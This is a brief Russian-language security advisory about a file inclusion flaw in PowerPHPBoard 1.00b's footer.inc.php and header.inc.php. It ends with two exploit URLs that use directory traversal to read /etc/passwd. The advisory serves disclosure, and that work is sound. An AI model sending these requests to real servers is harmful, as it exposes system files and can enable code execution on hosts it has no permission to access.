Программа: PowerPHPBoard 1.00b
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценариями footer.inc.php и header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://[server]/[installdir]/footer.inc.php?settings[footer] =../../../../../../../../../../../../../etc/passwd
http://[server]/[installdir]/header.inc.php?handler= 1234&settings[header]=../../../../../../../../../../../../../etc/passwd
